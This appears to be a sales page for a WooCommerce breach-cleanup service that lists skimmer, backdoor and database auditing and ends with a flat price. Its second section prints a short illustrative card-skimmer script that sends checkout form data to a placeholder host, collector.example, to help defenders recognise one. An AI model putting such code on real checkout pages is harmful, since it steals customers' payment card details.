WooCommerce store compromised?
We clean it.

§ 01 — WHAT GETS DONE

Both sides of the wire.

• [ CLIENT-SEITE ]

  Card skimmers, payment-form overlays, conditional redirects, cryptojackers. JavaScript on the checkout audited line by line.

• [ SERVER-SIDE ]

  Web shells, backdoors, plugin RCE payloads, injected admin users. Removed by reading file diffs and DB diffs, not pattern-matching.

• [ DB-AUDIT ]

  wp_options for autoloaded payloads, wp_posts for spam, wp_usermeta for sleeper privileges, wp_woocommerce_* tables for tampering.

• [ PLUGIN TRIAGE ]

  Active plugins reviewed against published CVEs. Vulnerable plugins patched or replaced — not just disabled.

• [ ABSICHERUNG ]

  wp-config lockdown, secret rotation, 2FA on admin, login surface reduction. Closes the door before signing off.

• [ BERICHT ]

  Plain-English forensic report: what was found, when it was introduced, what was removed. Hand it to an acquirer, an insurer, or your QSA.

§ 02 — WHAT A SKIMMER LOOKS LIKE

External script on the checkout. That's usually it.

A WooCommerce skimmer is often a single JavaScript inclusion on the checkout page that posts the customer's form fields to a remote host before WooCommerce submits the order. The script is tiny, the network call looks like a third-party analytics ping, and the customer sees nothing wrong.

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Real skimmers obfuscate the destination and only fire when the cart total is non-zero — but the structure is the same. Audit every JS on the checkout, not just the ones you remember installing.

§ PRICE

Flat $279. One-time. Per site.